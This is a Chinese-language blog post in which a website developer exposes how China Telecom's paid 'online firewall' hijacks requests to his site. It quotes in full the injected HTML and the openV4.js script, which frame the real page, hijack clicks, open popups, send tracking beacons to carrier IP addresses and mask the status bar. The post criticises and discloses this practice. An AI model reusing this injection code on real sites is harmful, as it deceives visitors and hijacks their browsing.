现在的互联网,有资源的企业蹂躏客户似乎已成为流行,不管愿不愿意,只要他认为OK,那总是要蹂躏一番的。这行当的领军人物360就不用说了,以蹂躏用户出身的——虽然现在的360产品用户体验真的不错!但却怎么也脱不了背地里的那些肮脏勾当。今天又发现一个让我无语的产品——电信在线防火墙!电信的劫持是老调重弹了。在线防火墙是收费的(8元/月),咱没交钱,本该享受不了的。但它却用这个东西来给我推送信息(这次给我推的是回访,虽然厌恶,但比广告好那么些)。
本来如果他做的好些,我是应该没有机会发现的,遗憾的是,他里面这些个IP有的时候竟然无法访问,导致请求不到数据,直接让我白屏了。放其他网站上,也许我会说:'这网站做的真垃圾,老白屏,错误都不给个' —— 在今天以前,出现这种情况,我是这个想法的。不过,今天发现自己开发的网站,也出现这种情况,怎么可能?!查看下源代码,看到了下面的内容,这... 还是我的网站么?
<html>
<head>
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="expires" content="-1">
<script>
<!--/*以下注释由MitchellChu添加,原本是没有的,相关参数已经调整过*/-->
//统计地址,亲~ 服务器好像扛不住了
var stat_path='http://61.145.194.131:81/stat.aspx?p=1347347|5883|235|0|0|0';
var cnt_path='';
// 这里不断的改变状态栏地址,以此来尽可能的让客户端用户发现不了
window.setInterval('window.status=location.href', 200);
</script>
</head>
<body scroll="no" style="border:0; margin:0; padding:0;" id="mainbody" screen_capture_injected="true">
<iframe src="about:blank" width="100%" height="100%" frameborder="0">
</iframe>
<!--这个加载的是什么东西?参见下面OpenV4.js代码->
<script language="JavaScript" src="http://218.16.103.69:1010/openV4.js"></script>
<script language="JavaScript">
// 这个是回访地址,当然,改成广告地址就是广告了.
var content='http://59.37.54.194:3606/111223/RestoreRevisit.aspx?p=1347347|5883|235|0|0|0¶m=here_is_some_web_info_id';
//这里是我原本访问的地址信息,后面自动带上了随机数(注:域名我改了)
var old_url='http://myDomainNameHere.com/resourcePath?1347347';
var param='350|250|9';
if(checkpop(stat_path)){
try{
OpenWin(content,stat_path,cnt_path,old_url);
}catch(e){}
}
else{
location.href = old_url;
}
</script>
</body>
</html>
上面的代码中,我半点自己网站的影子也没有找到,能看到和我网站有关系的也就是变量old_url了,里面存放的是我要访问的原始地址。初步看起来,应该做了统计和信息推送,RestoreRevisit.aspx,这个是回访——本次推送内容。这其中checkpop在openv4.js里面,代码如下:
var hInterval = null;
var hPInterval = null;
var fPOldClick = null;
var fOldClick = null;
var IsFirefox = false;
var isAlreadyShow = false;
var iWidth = 0;
var iHeight = 0;
var iPos = 1;
var iPid = 0;
var posLeft = 0;
var posTop = 0;
var styles = "";
///<summary>
///get the parameters
function getParams()
{
var params = param.split("|");
try
{
iWidth = parseInt(params[0],10);
iHeight = parseInt(params[1],10);
iPos = parseInt(params[2],10);
}
catch(e)
{
iWidth = 320;
iHeight = 240;
iPos = 1;
}
}
///</summary>
function calPosition()
{
var docHeight = window.screen.height;
var docWidth = window.screen.width;
//divide into 9 parts
var perWid = Math.round(docWidth / 3);
var perHei = Math.round(docHeight / 3);
switch(iPos)
{
case 1 :
posLeft = 0;
posTop = 0;
break;
case 2 :
posLeft = 0;
posTop = perHei;
break;
case 3 :
posLeft = 0;
posTop = perHei * 2;
break;
case 4 :
posLeft = perWid;
posTop = 0;
break;
case 5 :
posLeft = Math.round((docWidth - iWidth) / 2);
posTop = Math.round((docHeight - iHeight) / 2);
break;
case 6 :
posLeft = perWid;
posTop = perHei * 2;
break;
case 7 :
posLeft = perWid * 2;
posTop = 0;
break;
case 8 :
posLeft = perWid * 2;
posTop = perHei;
break;
case 9 :
posLeft = perWid * 2;
posTop = perHei * 2;
break;
default:
posLeft = perWid;
posTop = perHei;
break;
}
var leftAddwidth = parseInt(posLeft,10) + parseInt(iWidth,10);
var docWidMinusiWid = parseInt(docWidth,10) - parseInt(iWidth,10);
posLeft = leftAddwidth > parseInt(docWidth,10) ? (docWidMinusiWid > 0 ? docWidMinusiWid : 0) : (parseInt(posLeft,10));
var topAddheight = parseInt(posTop,10) + parseInt(iHeight,10);
var docHeiMinusiHei = parseInt(docHeight,10) - parseInt(iHeight,10);
posTop = topAddheight > parseInt(docHeight,10) ? (docHeiMinusiHei > 0 ? docHeiMinusiHei : 0) : (parseInt(posTop,10));
styles = "width="+iWidth+",height="+iHeight+",left="+posLeft+",top="+posTop;
}
///<summary>
///realize the onclick event handler in parent window
///</summary>
function pOnClick()
{
if(!isAlreadyShow)
{
if (GetCookie(String(iPid))==null)
{
if (!styles)
{
styles = "width=320, height=240, left=200, top=150,";
}
var h = window.open(content, "_blank", styles +
" ,directories=0, location=0, " +
"menubar=0, resizable=0, scrollbars=0, status=0, titlebar=0, toolbar=0");
if (h)
{
isAlreadyShow = true;
var img = new Image();
var imgstat = new Image();
img.src = stat_path+"&c=1";
imgstat.src = cnt_path;
}
SetCookie(iPid, iPid, { expires: 0.5, path: '/' });
}
if (null!=fPOldClick)
{
fPOldClick();
}
var parentDoc = parent.document;
if (IsFirefox)
{
parentDoc.removeEventListener("click", pOnClick, true);
if (fPOldClick)
{
parentDoc.addEventListener("click", fPOldClick, true);
}
}
else
{
parentDoc.body.onclick = fPOldClick;
}
}
}
///<summary>
///realize the onclick event handler in current window
///</summary>
function OnClick()
{
if(!isAlreadyShow)
{
if (GetCookie(String(iPid)) == null)
{
if (!styles)
{
styles = "width=320, height=240, left=200, top=150";
}
var h = window.open(content, "_blank", styles +
" ,directories=0, location=0, " +
"menubar=0, resizable=0, scrollbars=0, status=0, titlebar=0, toolbar=0");
if (h)
{
isAlreadyShow = true;
var img = new Image();
var imgstat = new Image();
img.src = stat_path+"&c=1";
imgstat.src = cnt_path;
}
SetCookie(iPid, iPid, { expires: 0.5, path: '/' });
}
if (null!=fOldClick)
{
fOldClick();
}
if (IsFirefox)
{
window.frames[0].document.removeEventListener("click", OnClick, true);
if (fOldClick)
{
window.frames[0].document.addEventListener("click", fOldClick, true);
}
}
else
{
window.frames[0].document.body.onclick = fOldClick;
}
}
}
///<summary>
///here register the onclick event to the parent window
///</summary>
function PCheckAd()
{
var win = parent;
if (!IsFirefox)
{
if (win.document.readyState != 'complete')
{
return;
}
}
try
{
var doc = win.document;
fPOldClick = doc.body.onclick;
if (IsFirefox)
{
doc.addEventListener("click",pOnClick,true);
}
else
{
doc.body.attachEvent("onclick", pOnClick);
// doc.body.onclick = pOnClick;
}
for (var i in doc.links)
{
if (doc.links[i].target == "")
{
doc.links[i].target = "_top";
}
}
for (var i in doc.forms)
{
if (doc.forms[i].target == "")
{
doc.forms[i].target = "_top";
}
}
}
catch(e)
{
}
window.clearInterval(hPInterval);
}
function CheckAd()
{
var win = window.frames[0];
if (!IsFirefox)
{
if (win.document.readyState != 'complete')
{
return;
}
}
try
{
var doc = win.document;
fOldClick = doc.body.onclick;
if (IsFirefox)
{
doc.addEventListener("click", OnClick, false);
}
else
{
doc.body.attachEvent("onclick", OnClick);
//doc.body.onclick = OnClick;
}
for (var i in doc.links)
{
if (doc.links[i].target == "")
{
doc.links[i].target = "_top";
}
}
for (var i in doc.forms)
{
if (doc.forms[i].target == "")
{
doc.forms[i].target = "_top";
}
}
}
catch(e)
{
}
window.clearInterval(hInterval);
hInterval = null;
}
function OpenWin(popurl,staturl,counturl,curl)
{
getParams();
calPosition();
var h = window.open(popurl, "_blank", styles +
" directories=0, location=0, " +
"menubar=0, resizable=0, scrollbars=0, status=0, titlebar=0, toolbar=0");
if (h)
{
var img = new Image();
img.src = staturl;
var imgcount = new Image();
imgcount.src = counturl;
location.href = curl;
return;
}
if (navigator.userAgent.indexOf("Firefox")!=-1)
{
IsFirefox = true;
}
if (top.location != self.location)
{
if (IsFirefox)
{
hPInterval = window.setInterval("PCheckAd()", 1000);
}
else
{
hPInterval = window.setInterval("PCheckAd()", 100);
}
//location.href = old_url;
}
if (!styles)
{
styles = "width=320, height=240, left=200, top=150";
}
if (window.frames.length!=1)
{
return;
}
window.frames[0].location = curl;
if (IsFirefox)
{
hInterval = window.setInterval("CheckAd()", 1000);
}
else
{
hInterval = window.setInterval("CheckAd()", 100);
}
}
function trim(text){
return (text || "").replace(/^\s+|\s+$/g, "");
}
function GetCookie(name) {
var cookieValue = null;
if (document.cookie && document.cookie != '') {
var cookies = document.cookie.split(';');
for (var i = 0; i < cookies.length; i++) {
var cookie = trim(cookies[i]);
if (cookie.substring(0, name.length + 1) == (name + '=')) {
cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
break;
}
}
}
return cookieValue;
}
function SetCookie(name, value, options) {
options = options || {};
if (value === null) {
value = '';
options.expires = -1;
}
var expires = '';
if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) {
var date;
if (typeof options.expires == 'number') {
date = new Date();
date.setTime(date.getTime() + (options.expires * 60 * 60 * 1000));
} else {
date = options.expires;
}
expires = '; expires=' + date.toUTCString();
}
var path = options.path ? '; path=' + (options.path) : '';
var domain = options.domain ? '; domain=' + (options.domain) : '';
var secure = options.secure ? '; secure' : '';
document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain, secure].join('');
}
function getparam(srcstr)
{
c_start = srcstr.indexOf("=") + 1;
return srcstr.substring(c_start);
}
function checkpop(arradd) {
if (!navigator.cookieEnabled)
return false;
var canopen = true;
try {
var ckname = getparam(arradd);
if (GetCookie(ckname) != null)
canopen = false;
else {
SetCookie(ckname, ckname, { expires: 24, path: '/' });
if (GetCookie(ckname) == null)
canopen = false;
}
}
catch (err) {
canopen = false;
}
getPid(arradd);
return canopen;
}
function getPid(arradd)
{
var params = arradd.split("|");
try
{
iPid = parseInt(params[2],10);
}
catch(e)
{
iPid=0;
}
}
从整体上来看,电信是使用在线防火墙来进行推送信息的,这防火墙是什么东西呢?
从他的说明来看,是多么的为咱们着想,为我们的浏览安全可是尽了十万分的力了。只是我纳闷的是,好好的网站,他动不动的劫持一下,给咱改改请求,给咱弹弹小窗。它本身是不是恶意代码?这个值得思考!